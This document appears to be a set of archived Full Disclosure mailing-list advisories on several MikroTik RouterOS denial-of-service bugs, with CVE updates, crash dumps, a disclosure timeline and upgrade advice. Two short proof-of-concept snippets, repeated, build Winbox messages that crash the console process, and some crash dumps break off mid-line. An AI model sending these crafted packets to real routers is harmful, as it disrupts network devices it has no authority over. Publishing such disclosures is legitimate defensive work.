Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access. CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年9月9日周三 下午9:02写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. memory corruption > The resolver process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > resolver process due to invalid memory access. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.28@0: /nova/bin/resolver > 2020.06.18-14:38:03.28@0: --- signal=11 > > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 > 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 > ebp=0x7fe5fd08 esp=0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 > ecx=0x77676f00 edx=0x0005 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: maps: > 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 > /nova/bin/resolver > 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc > e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 > 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c > 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: code: 0x80508f6 > 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 > 04 8b > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The user process suffers from an assertion failure vulnerability. There is > a reachable assertion in the user process. By sending a crafted packet, an > authenticated remote user can crash the user process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: /nova/bin/user > 2020.06.04-17:56:52.31@0: --- signal=6 > > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246 > 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 > ebp=0x7fee3790 esp=0x7fee3788 > 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 > ecx=0x00b4 edx=0x0006 > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: maps: > 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 > /nova/bin/user > 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 > /lib/libucrypto.so > 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 > /lib/liburadius.so > 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年8月13日周四 下午7:14写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. NULL pointer dereference > The igmpproxy process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > igmpproxy process due to NULL pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: --- signal=11 > > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 > 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 > ebp=0x7fa932a8 esp=0x7fa9326c > 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x > ecx=0x000b edx=0x > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: maps: > 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 > /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c > 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 > a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f > 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 > a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: code: 0x8050a8d > 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 > 0c 0f > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The ipsec process suffers from an assertion failure vulnerability. There > is a reachable assertion in the ipsec process. By sending a crafted packet, > an authenticated remote user can crash the ipsec process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: --- signal=6 > > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246 > 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 > ebp=0x7f8fa450 esp=0x7f8fa448 > 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 > ecx=0x0291 edx=0x0006 > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: maps: > 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 > /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 > /lib/libdl-0.9.33.2.so > 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 > /ram/pckg/dhcp/lib/libudhcp.so > 2020.06.04-18:25:16.04@0: 774d2
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service due via the loop counter variable. Q C 于2020年5月10日周日 上午10:41写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: until stable 6.45.7 (first vulnerability), until stable > 6.46.4 (second vulnerability) > Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second > vulnerability) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > stable release tree when found. Maybe other release trees also suffer from > these vulnerabilities. > > 1. The cerm process suffers from an uncontrolled resource consumption > issue. By sending a crafted packet, an authenticated remote user can cause > a high cpu load, which may make the device respond slowly or unable to > respond. > > 2. The traceroute process suffers from a memory corruption issue. By > sending a crafted packet, an authenticated remote user can crash the > traceroute process due to invalid memory access. > > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/stable-release-tree > > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been assigned to these two vulnerabilities. CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference) CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet Q C 于2020年4月14日周二 下午6:29写道: > [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers > from these two vulnerabilities. > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: through 6.46.5 (stable release tree) > Fixed Versions: - > Vendor URL: https://mikrotik.com/ > Vendor Status: not fix yet > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > Poc > === > The following pocs are based on the tool routeros ( > https://github.com/tenable/routeros) > > 1) memory corruption in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe000c, -1); > msg.add_u32(9, 9); > > 2) assertion failure in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe0001, 0); > > Disclosure timeline > === > 2019/08/23reported the 2nd issue to the vendor > 2019/08/26reported the 1st issue to the vendor > 2019/08/28vendor reproduced the 1st issue and will fix it as soon as > possible > 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as > possible > 2019/12/02notified the vendor the 1st issue still exists in version > 6.44.6 (2nd issue fixed) > 2020/01/06no response from the vendor, and did the initial disclosure > 2020/04/14re-tested these two issues against the stable 6.46.5, and > updated the disclosure > > > > Q C 于2020年1月6日周一 下午7:32写道: > >> Advisory: two vulnerabilities found in MikroTik's RouterOS >> >> >> Details >> === >> >> Product: MikroTik's RouterOS >> Affected Versions: before 6.44.6 (Long-term release tree) >> Fixed Versions: 6.44.6 (Long-term release tree) >> Vendor URL: https://mikrotik.com/ >> Vendor Status: fixed version released >> CVE: - >> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team >> >> >> Product Description >> == >> >> RouterOS is the operating system used on the MikroTik's devices, such as >> switch, router and access point. >> >> >> Description of vulnerabilities >> == >> >> These two vulnerabilities were tested only against the MikroTik RouterOS >> long-term release tree when found. Maybe other release trees also suffer >> from these issues. >> >> 1. The console process suffers from a memory corruption issue. >> An authenticated remote user can crash the console process due to a NULL >> pointer reference by sending a crafted packet. >> >> 2. The console process suffers from an assertion failure issue. There is >> a reachable assertion in the console process. An authenticated remote user >> can crash the console process duo to assertion failure by sending a crafted >> packet. >> >> Solution >> >> >> Upgrade to the corresponding latest RouterOS tree version. >> >> >> References >> == >> >> [1] https://mikrotik.com/download/changelogs/long-term-release-tree >> > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities. Details === Product: MikroTik's RouterOS Affected Versions: through 6.46.5 (stable release tree) Fixed Versions: - Vendor URL: https://mikrotik.com/ Vendor Status: not fix yet CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Poc === The following pocs are based on the tool routeros ( https://github.com/tenable/routeros) 1) memory corruption in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe000c, -1); msg.add_u32(9, 9); 2) assertion failure in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe0001, 0); Disclosure timeline === 2019/08/23reported the 2nd issue to the vendor 2019/08/26reported the 1st issue to the vendor 2019/08/28vendor reproduced the 1st issue and will fix it as soon as possible 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as possible 2019/12/02notified the vendor the 1st issue still exists in version 6.44.6 (2nd issue fixed) 2020/01/06no response from the vendor, and did the initial disclosure 2020/04/14re-tested these two issues against the stable 6.46.5, and updated the disclosure Q C 于2020年1月6日周一 下午7:32写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: before 6.44.6 (Long-term release tree) > Fixed Versions: 6.44.6 (Long-term release tree) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > long-term release tree when found. Maybe other release trees also suffer > from these issues. > > 1. The console process suffers from a memory corruption issue. > An authenticated remote user can crash the console process due to a NULL > pointer reference by sending a crafted packet. > > 2. The console process suffers from an assertion failure issue. There is a > reachable assertion in the console process. An authenticated remote user > can crash the console process duo to assertion failure by sending a crafted > packet. > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/long-term-release-tree > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
